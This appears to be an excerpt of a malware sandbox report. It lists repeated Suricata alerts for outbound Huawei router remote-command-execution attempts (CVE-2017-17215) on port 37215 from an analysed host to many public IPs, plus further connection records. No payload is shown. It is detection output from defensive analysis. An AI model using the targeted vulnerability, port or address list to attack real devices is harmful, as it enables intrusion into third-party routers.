      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40130 -> 157.45.26.112:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:33644 -> 96.21.12.165:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:46472 -> 41.57.234.65:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:60468 -> 197.81.150.2:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57540 -> 116.33.253.168:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:41780 -> 197.156.123.222:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:37964 -> 197.52.127.235:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:59270 -> 157.21.245.73:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40822 -> 87.175.46.160:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57566 -> 41.198.247.140:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:45270 -> 41.134.210.55:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:35772 -> 197.159.64.71:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:51452 -> 188.202.42.133:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:34726 -> 197.8.154.108:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:42274 -> 157.192.7.132:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56718 -> 110.170.212.107:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:46698 -> 197.120.29.185:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56672 -> 80.77.40.13:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:37060 -> 41.222.42.87:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:60798 -> 197.195.222.223:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:49450 -> 175.35.71.242:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:43254 -> 197.226.220.5:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:43480 -> 197.235.72.228:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:51936 -> 41.132.254.126:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:49962 -> 157.91.52.223:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40210 -> 157.235.66.17:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:50068 -> 157.17.34.210:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:38372 -> 157.16.81.170:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:51366 -> 197.196.101.168:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:39868 -> 41.26.253.33:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:55208 -> 73.137.65.186:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58702 -> 104.6.127.133:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:37084 -> 41.192.77.71:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:51740 -> 197.202.167.252:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58506 -> 197.159.16.216:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:43194 -> 41.130.158.231:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:44252 -> 118.246.28.77:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:37128 -> 41.202.207.90:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:46508 -> 157.181.0.221:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:36260 -> 197.2.29.146:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:43752 -> 41.59.210.241:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58906 -> 142.56.38.44:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:39480 -> 154.239.39.149:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:33898 -> 197.157.123.230:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:48508 -> 197.181.15.35:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:33744 -> 94.131.27.42:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57362 -> 196.232.99.3:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:60662 -> 41.105.179.76:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40272 -> 110.54.53.209:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:44924 -> 41.161.81.162:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53636 -> 157.37.59.82:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:39502 -> 41.161.214.72:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:54072 -> 197.7.146.205:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56196 -> 157.83.103.222:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:54044 -> 161.193.95.28:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57296 -> 197.197.51.34:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:47930 -> 197.172.22.139:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58122 -> 179.65.152.38:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:36756 -> 41.191.34.235:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:50474 -> 197.115.157.83:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:37564 -> 83.255.87.174:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:33356 -> 157.194.162.213:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:36694 -> 157.90.116.20:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:45280 -> 41.222.129.97:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:36174 -> 197.48.64.147:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:37204 -> 157.214.5.242:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:46610 -> 157.85.121.178:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:50338 -> 197.188.236.0:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:51134 -> 191.251.110.92:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:46232 -> 197.94.12.179:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:32950 -> 197.77.197.31:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:43598 -> 41.132.185.34:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:32810 -> 157.160.67.118:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:43242 -> 162.43.119.244:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:48128 -> 197.123.235.176:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:33582 -> 41.22.147.213:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:41910 -> 186.47.36.220:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:45476 -> 197.68.115.131:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:38734 -> 41.61.28.130:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57894 -> 197.53.129.148:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:38474 -> 188.182.228.162:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:54450 -> 197.22.45.162:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:41256 -> 157.148.57.35:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:38308 -> 41.133.92.207:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58202 -> 157.190.147.114:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57568 -> 197.27.200.10:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:45268 -> 157.197.226.101:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:33934 -> 41.26.98.169:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:49568 -> 157.239.44.123:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:43278 -> 197.79.208.229:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56192 -> 197.216.106.189:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:39300 -> 157.108.6.242:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:45014 -> 20.5.26.249:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:45516 -> 157.252.228.197:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:37682 -> 157.29.129.148:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:38900 -> 41.223.210.1:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57090 -> 197.217.111.129:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:52482 -> 157.251.62.148:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:44764 -> 105.167.255.193:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:48764 -> 137.79.239.199:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:36598 -> 41.42.180.67:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:59464 -> 186.114.155.15:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:43802 -> 167.168.169.107:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:60954 -> 41.218.210.173:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:51552 -> 157.138.212.35:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:50198 -> 132.239.200.32:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:36060 -> 197.147.158.92:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58330 -> 41.219.106.153:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:38306 -> 111.201.68.197:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:55376 -> 197.86.113.224:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:54156 -> 1.161.165.234:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56620 -> 182.102.94.230:37215
      Source: global trafficTCP traffic: 41.76.145.163 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.198.227.69 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.75.127.252 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 87.47.142.86 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.219.90.55 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.179.242.22 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.132.198.115 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.137.205.161 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.240.80.189 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.234.192.151 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 80.120.167.73 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.191.94.155 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 181.22.21.131 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.163.89.138 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 151.131.255.47 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.50.228.215 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.128.225.222 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.143.235.71 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.115.46.68 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 42.147.212.78 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 196.169.174.4 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 159.134.230.110 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.167.175.11 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 131.126.166.210 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 83.158.9.14 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 54.134.35.81 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 201.151.252.65 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 169.219.149.56 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.144.80.224 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.63.181.105 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.251.145.45 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 130.163.43.123 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.37.80.145 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.254.240.72 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 17.132.179.6 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.57.222.8 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 18.56.102.241 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.149.29.190 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.221.240.117 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 121.1.89.2 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 169.39.43.63 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.45.7.174 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.190.56.15 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 125.82.65.173 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.255.41.29 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.133.118.235 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 25.200.109.29 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 180.76.19.159 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 64.112.0.88 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.161.224.202 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.231.11.22 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.9.47.212 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 37.78.89.120 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 184.149.220.48 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.246.91.247 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.1.4.199 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.230.110.41 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.169.142.14 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.76.250.140 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 128.34.60.131 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 13.174.14.112 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.217.182.245 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.240.86.17 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 118.67.76.212 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.10.8.133 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.0.163.219 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 35.81.84.186 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.92.138.7 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 24.226.72.137 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.72.107.150 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.199.114.238 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 143.71.206.242 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 141.38.129.46 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 38.60.72.179 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.31.109.151 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.214.67.51 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.164.116.53 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.36.136.81 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.246.152.88 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.239.102.197 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 88.190.243.235 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.196.4.125 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.44.214.96 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.59.182.107 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.93.156.91 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 48.55.140.7 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.161.194.85 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.143.76.214 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.8.228.71 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.50.231.239 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.59.103.67 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.181.128.177 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.2.17.212 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.35.94.109 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 41.26.203.246 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.186.131.227 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.133.128.236 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.150.215.197 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.57.113.236 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.53.193.54 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 197.79.89.152 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.1.176.165 ports 1,2,3,5,7,37215
      Source: global trafficTCP traffic: 157.179.234.39 ports 1,2,3,5,7,37215
